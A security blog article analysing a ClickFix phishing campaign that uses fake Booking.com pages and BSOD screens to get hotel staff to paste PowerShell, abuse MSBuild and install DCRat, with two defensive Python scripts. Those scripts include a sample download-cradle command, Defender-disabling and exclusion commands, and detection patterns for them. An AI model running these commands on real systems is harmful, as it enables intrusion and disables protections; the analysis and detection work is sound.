
ClickFix Attack Uses Fake Windows BSOD Screens to Deploy Malware

A sophisticated ClickFix attack has been observed targeting organizations in the hospitality sector, using fake Windows Blue Screen of Death (BSOD) screens and trusted system utilities to trick users into manually executing malware on their own systems. The campaign, tracked by security researchers as PHALT#BLYX, relies entirely on social engineering rather than software vulnerabilities, making it particularly effective against pressured or non-technical users.

ClickFix Attack Uses Fake Windows BSOD Screens

Unlike traditional malware attacks that exploit flaws in operating systems or applications, this campaign convinces victims to perform the malicious actions themselves. By abusing familiar Windows interfaces, trusted Microsoft binaries, and realistic phishing lures, the attackers are able to bypass many standard security controls and establish persistent remote access.

Overview of the ClickFix Social Engineering Technique

ClickFix attacks are a form of social engineering where victims are presented with an apparent system error or security issue and are then guided through steps to “fix” the problem. These steps are designed to look like legitimate troubleshooting actions but instead result in the execution of malicious commands.

Common ClickFix lures include fake browser errors, CAPTCHA failures, update prompts, and security warnings. In this campaign, the attackers escalate the deception by simulating a full Windows Blue Screen of Death, a screen most users associate with critical system failure.

By creating a moment of panic and urgency, the attackers reduce the likelihood that the victim will question the instructions being presented.

PHALT#BLYX Campaign Targeting the Hospitality Sector

The PHALT#BLYX campaign has been observed primarily targeting hospitality organizations, particularly hotels and accommodation providers across Europe. The phishing emails used in this operation impersonate Booking.com and claim that a guest has cancelled a reservation involving a significant financial charge, often exceeding €1,000.

This tactic exploits the fast-paced nature of hospitality operations, where staff are accustomed to handling booking disputes, refunds, and customer complaints quickly. The presence of large euro-denominated charges suggests a deliberate focus on European organizations.

Initial Infection Vector: Phishing Email Lure

The attack begins with a phishing email crafted to resemble official correspondence from Booking.com. The message typically references a reservation cancellation and includes a call to action such as “See Details” to review the charge.

The urgency created by the financial amount encourages recipients to click the link without verifying its legitimacy. Instead of directing users to the real Booking.com platform, the link routes through intermediate redirectors before landing on a malicious domain controlled by the attackers.

Stage One: Fake Booking.com Website

The malicious landing page is a high-fidelity clone of the legitimate Booking.com interface. It uses accurate branding, color schemes, fonts, and layout, making it difficult to distinguish from the real site at a glance.

Rather than displaying reservation details, the page presents a fake browser error message stating that the page is taking too long to load. A prominent “Refresh page” button is displayed, but this element is not a native browser control. It is a scripted component designed to trigger the next stage of the attack.

At the time of analysis, the malicious domain hosting this page remained largely undetected by web filtering solutions, allowing the attackers to reach victims without interruption.

Stage Two: Fake BSOD and ClickFix Execution

When the victim clicks the fake refresh button, the page uses that click to push the browser into full-screen mode (the Fullscreen API requires a user gesture, which the button supplies) and displays a simulated Windows Blue Screen of Death. The sudden appearance of a BSOD is intended to shock the user and create the impression that their system has crashed.

Over the fake crash screen, instructions appear telling the user how to “fix” the issue. The steps typically instruct the victim to open the Windows Run dialog using the Windows key and R, paste clipboard contents using CTRL and V, and then press Enter.

What the victim does not realize is that script on the page silently wrote a malicious PowerShell command to their clipboard when they clicked the fake button. By following the on-screen instructions, the user pastes and executes the malware themselves.

This ClickFix technique is effective because it sidesteps controls built around automated execution: no exploit fires, the browser never writes a file to disk, and the first malicious process is a Microsoft-signed shell launched by the user from the Run dialog, so the process tree looks like ordinary interactive activity.

Stage Three: PowerShell Dropper Execution

The pasted command launches a PowerShell script that performs multiple actions in quick succession. First, it opens a legitimate Booking.com administrative page in the user’s browser as a decoy, reinforcing the illusion that the action was safe.

In the background, the script searches the system for a legitimate copy of MSBuild.exe, the Microsoft Build Engine shipped with the .NET Framework. Once found, it downloads a malicious MSBuild project file, commonly named v.proj, and saves it to the ProgramData directory.

The script then executes MSBuild.exe with the downloaded project file as input, causing MSBuild to compile and execute the embedded malicious code.

Abuse of MSBuild and Living off the Land Techniques

Using MSBuild.exe is a classic Living off the Land technique. MSBuild is a trusted, signed Microsoft binary that many security products and application control policies allow to run by default, which is exactly why it appears on Microsoft's recommended block list for Windows Defender Application Control.

The malicious project file contains inline code that MSBuild executes as part of its normal operation. Because the execution is performed by a trusted utility, basic defenses may not flag the activity as suspicious.

This shift to MSBuild-based execution represents an evolution from earlier variants of the campaign, which relied on simpler methods such as HTML application files executed via mshta.exe. Those earlier approaches were easier for antivirus software to detect.
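To make the inline-task pattern concrete, here is an added Python triage script. It is not the campaign's v.proj and not code from the researchers' report; it parses an MSBuild project file, flags the UsingTask/CodeTaskFactory construction MSBuild uses to compile and run embedded C# during a build, lists watchlist strings found in the inline code, and pulls out Cyrillic string runs of the kind the attribution section below describes. The two project files embedded in it are constructed samples, and the watchlist and the Cyrillic comment are assumptions made for illustration.

```python
"""Static triage of an MSBuild project file for the inline-task abuse pattern.
Added example; the project files below are constructed, not the campaign's."""
import re
import xml.etree.ElementTree as ET

# Hypothetical watchlist: strings with no business inside a build script.
SUSPICIOUS_STRINGS = (
    "Add-MpPreference", "Set-MpPreference", "DisableRealtimeMonitoring",
    "Start-BitsTransfer", "FromBase64String", "DownloadString",
    "VirtualAllocEx", "WriteProcessMemory", "ResumeThread",
)
# Runs of three or more Cyrillic letters (U+0400..U+04FF).
CYRILLIC_WORD = re.compile(r"[\u0400-\u04FF]{3,}")


def _local(tag):
    """Strip the XML namespace that classic MSBuild files carry on every tag."""
    return tag.rsplit("}", 1)[-1]


def scan_project(xml_text):
    """Return a list of findings; an empty list means nothing stood out."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        name = _local(el.tag)
        if name == "UsingTask" and el.get("TaskFactory") in ("CodeTaskFactory", "RoslynCodeTaskFactory"):
            # This is the construction that makes MSBuild compile and run source code
            # embedded in the project file, with no separate assembly on disk.
            findings.append(f"inline task factory {el.get('TaskFactory')} for task {el.get('TaskName')}")
        elif name == "Code":
            body = el.text or ""
            findings.append(f"inline {el.get('Language', 'cs')} code ({len(body.strip())} chars)")
            findings += [f"suspicious string: {s}" for s in SUSPICIOUS_STRINGS if s in body]
        elif name == "Exec":
            findings.append(f"Exec task: {el.get('Command', '')}")
    words = sorted(set(CYRILLIC_WORD.findall(xml_text)))
    if words:
        findings.append("cyrillic strings: " + ", ".join(words))
    return findings


# Constructed sample: an ordinary compile-only project, expected to be clean.
CLEAN_PROJ = r"""<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <Compile Include="Program.cs" />
  </ItemGroup>
  <Target Name="Build">
    <Csc Sources="@(Compile)" OutputAssembly="app.exe" />
  </Target>
</Project>"""

# Constructed sample of the inline-task shape, deliberately inert: the C# body only
# starts a command that contains watchlist strings and carries a Cyrillic comment.
SUSPICIOUS_PROJ = r"""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <RunMe />
  </Target>
  <UsingTask TaskName="RunMe" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class RunMe : Task {
          public override bool Execute() {
            // отладка: запуск задачи
            System.Diagnostics.Process.Start("powershell",
                "-c Set-MpPreference -DisableRealtimeMonitoring $true");
            return true;
          }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>"""


if __name__ == "__main__":
    for label, proj in (("clean", CLEAN_PROJ), ("suspicious", SUSPICIOUS_PROJ)):
        print(label, scan_project(proj) or "no findings")
```

Any UsingTask with an inline code factory in a file that arrived outside a source checkout deserves a look on its own; the string and Cyrillic checks only add context.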

Defense Evasion and Privilege Handling

Once executed, the MSBuild project attempts to evade detection by modifying Windows Defender settings. It adds exclusions for key directories and file extensions, ensuring that subsequent malware components are ignored by real-time scanning.

The malware then checks whether it is running with administrative privileges. If it already has elevated access, it proceeds to disable real-time protection, download the main payload using the Background Intelligent Transfer Service, and establish persistence.

If administrative privileges are not available, the malware repeatedly triggers User Account Control prompts in an attempt to pressure the user into granting elevated access.

Final Payload: DCRat Remote Access Trojan

The final payload deployed in this campaign is DCRat, a remote access Trojan widely used by threat actors for long-term system control. The malware is delivered as a heavily obfuscated .NET binary and injected into legitimate system processes using process hollowing techniques.

Once active, DCRat establishes a connection to its command-and-control infrastructure and sends a detailed fingerprint of the infected system. This includes information about the operating system, user privileges, antivirus software, domain membership, and active processes.

The malware supports a wide range of malicious capabilities, including remote desktop access, keylogging, reverse shell execution, and the ability to load additional payloads directly into memory. In observed cases, attackers used this access to deploy cryptocurrency miners, though the same access could be used for data theft or lateral movement.

Attribution Indicators and Threat Actor Profile

Analysis of the malicious project files revealed the presence of Cyrillic-language debug strings embedded in the code. These strings appear to be written in natural Russian rather than machine-translated text, suggesting a Russian-speaking developer or the use of a Russian-origin malware kit.

DCRat itself is commonly sold and distributed within Russian-speaking underground communities, further supporting this attribution. While definitive attribution is difficult, these indicators align with known Russian-linked threat actor activity.

Why This ClickFix Attack Is Effective

This campaign succeeds because it combines psychological pressure with technical abuse of trusted system components. Victims are placed under stress by fake financial disputes, confronted with realistic system failure screens, and then guided step by step into executing the malware themselves.

By the time traditional security controls react, the malware has already established persistence and blended into legitimate system processes.

Indicators of Compromise and Detection Challenges

Organizations should be alert for unusual execution of MSBuild.exe, especially when the project file lives in a user-writable directory such as ProgramData or when MSBuild is launched by PowerShell rather than a developer tool. The creation of .proj files outside source trees, unexpected Windows Defender exclusions, and the presence of Internet Shortcut (.url) files in Startup folders are additional warning signs.

PowerShell logs (script block logging and process creation events with command lines) and unexpected outbound network connections from legitimate system binaries can also help detect similar attacks. Clipboard contents are rarely logged, but the Windows Run dialog records what was typed or pasted into it under the user's RunMRU registry key, which makes a quick forensic check on a suspected host.
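The warning signs above translate into a handful of process-tree and file-creation rules. The following Python is an added example, not the researchers' detection content: it evaluates those rules over a small batch of constructed Sysmon-style events (field names follow Sysmon's EventID 1 process-create and EventID 11 file-create events; the rule names, directory list and regexes are the author's own assumptions). The batch contains one legitimate developer build that must stay quiet alongside the ClickFix chain described on this page.

```python
"""Detection rules for the MSBuild-based ClickFix chain, run over constructed
Sysmon-style events. Added example; rule names and thresholds are assumptions."""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
WRITABLE_DIRS = ("\\programdata\\", "\\users\\public\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|invoke-expression|\biex\b|frombase64string", re.I)
DEFENDER_TAMPER = re.compile(r"(add|set)-mppreference|disablerealtimemonitoring", re.I)
PROJECT_ARG = re.compile(r'[^\s"]+\.(?:proj|csproj|vbproj|targets|xml)\b', re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)


def _exe(path):
    return PureWindowsPath(path).name.lower()


def _in_writable_dir(path):
    return any(d in path.lower() for d in WRITABLE_DIRS)


def evaluate(event):
    """Return the names of every rule that fires for one event."""
    hits = []
    if event["EventID"] == 1:
        image, parent, cmd = _exe(event["Image"]), _exe(event["ParentImage"]), event["CommandLine"]
        # Win+R launches under explorer.exe, so a script host spawned by explorer
        # with a download cradle on its command line is the pasted ClickFix command.
        if image in SCRIPT_HOSTS and parent == "explorer.exe" and DOWNLOAD_CRADLE.search(cmd):
            hits.append("clickfix_run_dialog_cradle")
        if image == "msbuild.exe":
            if any(_in_writable_dir(p) for p in PROJECT_ARG.findall(cmd)):
                hits.append("msbuild_project_in_writable_dir")
            if parent in SCRIPT_HOSTS:
                hits.append("msbuild_spawned_by_script_host")
        if parent == "msbuild.exe" and image in SCRIPT_HOSTS:
            hits.append("msbuild_spawns_script_host")
        if DEFENDER_TAMPER.search(cmd):
            hits.append("defender_exclusion_or_disable")
        if image == "bitsadmin.exe" or re.search(r"start-bitstransfer", cmd, re.I):
            hits.append("bits_download")
    elif event["EventID"] == 11:
        target = event["TargetFilename"]
        if target.lower().endswith(".url") and STARTUP_DIR.search(target):
            hits.append("url_shortcut_in_startup")
        if target.lower().endswith(".proj") and _in_writable_dir(target):
            hits.append("proj_dropped_in_writable_dir")
    return hits


def run(events):
    """Evaluate a batch; returns (event index, rule) pairs in evaluation order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in evaluate(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSB = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

# Constructed events. Index 0 is a legitimate build and must not fire.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": MSB,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r'MSBuild.exe "C:\src\app\app.csproj" /t:Build'},
    # the pasted command: Win+R makes explorer.exe the parent
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('https://example.invalid/x')\""},
    # dropper writes the project file, then hands it to MSBuild
    {"EventID": 11, "TargetFilename": r"C:\ProgramData\v.proj"},
    {"EventID": 1, "Image": MSB, "ParentImage": PS, "CommandLine": r"MSBuild.exe C:\ProgramData\v.proj"},
    # the inline task tampers with Defender
    {"EventID": 1, "Image": PS, "ParentImage": MSB,
     "CommandLine": r'powershell -c "Add-MpPreference -ExclusionPath C:\ProgramData"'},
    # persistence via an Internet Shortcut in the Startup folder
    {"EventID": 11,
     "TargetFilename": r"C:\Users\frontdesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url"},
]


if __name__ == "__main__":
    for idx, rule in run(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The parent-process conditions do most of the work: MSBuild launched by PowerShell, or PowerShell launched by MSBuild, almost never happens in a real build, whereas MSBuild launched by devenv.exe with a project under a source tree is routine and stays quiet here.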

MITRE ATT&CK Techniques Observed

This campaign maps to multiple MITRE ATT&CK techniques: Phishing: Spearphishing Link (T1566.002), User Execution (T1204), Command and Scripting Interpreter: PowerShell (T1059.001), Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001), Impair Defenses: Disable or Modify Tools (T1562.001), BITS Jobs (T1197), Process Injection: Process Hollowing (T1055.012), and Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001).

Understanding how these techniques are chained together is critical for building effective detection and response strategies.

Sean Doyle

Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.